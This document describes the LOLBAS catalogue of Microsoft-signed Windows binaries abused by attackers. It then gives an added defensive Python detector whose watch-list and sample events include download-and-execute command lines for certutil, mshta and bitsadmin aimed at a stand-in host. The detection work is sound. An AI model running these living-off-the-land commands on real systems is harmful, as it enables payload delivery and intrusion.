LOLBAS project¶
LOLBAS stands for Living Off the Land Binaries And Scripts. The project's primary goal is to gather and document the Microsoft-signed and built-in tools that can be used for Living Off the Land techniques, including binaries, scripts, and libraries.
The criteria for a tool to be considered a “Living Off the Land” technique and accepted into the LOLBAS project are:
Microsoft-signed file native to the OS or downloaded from Microsoft.
Having additional interesting unintended functionality not covered by known use cases.
Benefits an APT (Advanced Persistent Threat) or Red Team engagement.
The LOLBAS project accepts tool submissions that fit one of the following functionalities:
Arbitrary code execution
File operations, including downloading, uploading, and copying files.
Compiling code
Persistence, including hiding data in Alternate Data Streams (ADS) or executing at logon.
UAC bypass
Dumping process memory
DLL injection
Counter moves¶
LOLBAS catalogues the trusted, Microsoft-signed binaries that attackers reuse, and that catalogue is just as useful to defenders. Because the binary itself is legitimate, blocking it outright is rarely an option; application allow-listing and command-line monitoring of the listed binaries are the corresponding controls, since the arguments and the parent process are what distinguish misuse from normal use. Seen from the other side, this sits in the blue-team notes on plausibility as cover.
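The following is an added example, not code from the LOLBAS project or from this page, showing what the command-line monitoring described above looks like in practice for the functionality categories listed earlier (download and execute). It scans constructed process-creation events (the kind of data Sysmon Event ID 1 or Windows Security Event 4688 provide) and flags invocations of trusted Microsoft binaries whose command line matches a watch-list pattern, while honouring an allow-list of parent processes. The watch-list, its patterns, the `Image=...|CommandLine=...|ParentImage=...` event format and the sample events are all assumptions made for illustration; they are not the LOLBAS catalogue.

```python
"""Added example: a minimal command-line monitor for LOLBAS-style misuse.

This is illustrative code, not part of the LOLBAS project. The watch-list,
the event format and the sample events below are constructed assumptions.
"""
import re
from dataclasses import dataclass

# Watch-list keyed by lowercase image name. Each entry pairs one of the
# page's functionality categories with a regex over the full command line.
# Assumption: this is an illustrative subset, not the project's catalogue.
WATCHLIST = {
    "certutil.exe": [("download", re.compile(r"-urlcache\b.*\bhttps?://", re.I))],
    "mshta.exe": [("execute", re.compile(r"\b(javascript:|vbscript:|https?://)", re.I))],
    "rundll32.exe": [("execute", re.compile(r"\bjavascript:", re.I))],
    "bitsadmin.exe": [("download", re.compile(r"/transfer\b", re.I))],
}


@dataclass
class Finding:
    image: str          # lowercase file name of the flagged binary
    category: str       # functionality category from the watch-list
    command_line: str   # full command line that matched
    parent: str         # lowercase file name of the parent process


def image_name(path):
    """Reduce a full image path to its lowercase file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line):
    """Parse a constructed 'key=value|key=value' process-creation event."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def scan(lines, allowlisted_parents=()):
    """Return a Finding for every event whose image and command line match
    the watch-list, skipping events spawned by an allow-listed parent
    (for example a known software-deployment agent)."""
    findings = []
    for line in lines:
        event = parse_event(line)
        image = image_name(event.get("image", ""))
        parent = image_name(event.get("parentimage", ""))
        command_line = event.get("commandline", "")
        if parent in allowlisted_parents:
            continue
        for category, pattern in WATCHLIST.get(image, []):
            if pattern.search(command_line):
                findings.append(Finding(image, category, command_line, parent))
    return findings


# Constructed sample events: two benign uses, two misuse patterns, and one
# misuse pattern spawned by a parent that an operator has allow-listed.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -hashfile C:\\setup.exe SHA256|ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -urlcache -f http://example.invalid/p.txt p.txt|ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta http://example.invalid/page.hta|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "Image=C:\\Windows\\System32\\rundll32.exe|CommandLine=rundll32 shell32.dll,Control_RunDLL|ParentImage=C:\\Windows\\explorer.exe",
    "Image=C:\\Windows\\System32\\bitsadmin.exe|CommandLine=bitsadmin /transfer job http://example.invalid/a.txt C:\\a.txt|ParentImage=C:\\Windows\\ccmexec.exe",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS, allowlisted_parents=("ccmexec.exe",)):
        print(f"[{finding.category}] {finding.image} <- {finding.parent}: {finding.command_line}")
```

Note the design choice: the benign `certutil -hashfile` and `rundll32 shell32.dll,Control_RunDLL` invocations are not flagged, which is the whole point of monitoring arguments rather than the binary name, and the allow-list is applied to the parent process rather than to the binary, so a deployment agent can keep using `bitsadmin` without silencing the same pattern when it appears under an Office process.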